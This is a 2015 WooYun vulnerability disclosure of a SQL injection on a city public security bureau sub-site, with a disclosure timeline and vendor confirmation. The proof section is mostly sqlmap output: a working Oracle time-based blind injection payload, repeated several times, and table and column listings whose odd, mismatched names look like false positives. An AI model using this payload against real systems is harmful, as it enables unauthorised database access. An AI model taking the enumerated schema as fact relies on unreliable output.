当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146274

漏洞标题:某市公安局分站SQL注入漏洞一枚

相关厂商:公安部一所

漏洞作者: 隔壁老三

提交时间:2015-10-13 13:29

修复时间:2015-11-30 22:08

公开时间:2015-11-30 22:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

SQL注入

详细说明:

防查水表不深入

漏洞证明:

注入点http://**.**.**.**/zjlsga/cmsWebapp/zjls/jsp/wsbs/serviceSearch.jsp?deptUnid=6327FE43C41759B71D4BB9EF6C71F5DC
sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ORACLE
[7 tables]
+----------------------+
| MSmerge_errorlineage |
| adminrights |
| bestellung |
| loginout |
| mymps_news_img |
| parts |
| tbladmin |
+----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ORACLE
Table: TBLADMIN
[17 columns]
+------------------+-------------+
| Column | Type |
+------------------+-------------+
| authentication | non-numeric |
| c_commu_topic_id | non-numeric |
| course_name | non-numeric |
| dnum | non-numeric |
| email | non-numeric |
| gab_pergunta | non-numeric |
| index_num | non-numeric |
| indice_id | non-numeric |
| lake_id | non-numeric |
| menu | non-numeric |
| orderno | non-numeric |
| pass | non-numeric |
| reddito | non-numeric |
| source | non-numeric |
| sub_image5 | non-numeric |
| uname | non-numeric |
| user_login | non-numeric |
+------------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ADMINRIGHTS
[21 tables]
+-------------------------+
| CPG_filetypes |
| Login |
| SUPPORT_INCIDENTS |
| Volume |
| activity |
| adminid |
| content |
| klassen |
| memberid |
| notes |
| p0fs |
| partsvendor |
| pass_hash |
| plugin_sid |
| rating_track |
| sailors |
| spip_messages |
| spip_versions_fragments |
| vcd_VcdToPornStudios |
| warehouse |
| zips |
+-------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---
Database: ADMINRIGHTS
Table: LOGIN
[15 columns]
+---------------------------+-------------+
| Column | Type |
+---------------------------+-------------+
| app_id | non-numeric |
| att_codice | non-numeric |
| blogpermissiongroup | non-numeric |
| emri | non-numeric |
| grtov | non-numeric |
| loginrestrictedtonickname | non-numeric |
| magic | non-numeric |
| news_date | non-numeric |
| old | non-numeric |
| origin | non-numeric |
| rank_id | non-numeric |
| tempid | non-numeric |
| tempprovkredit | non-numeric |
| wdatarow | non-numeric |
| xevento | non-numeric |
+---------------------------+-------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: deptUnid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: deptUnid=6327FE43C41759B71D4BB9EF6C71F5D' AND 2555=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(65)||CHR(70)||CHR(74),5) AND 'PGCL'='PGCL
---

修复方案:

你懂的

版权声明:转载请注明来源 隔壁老三@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-10-16 22:06

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无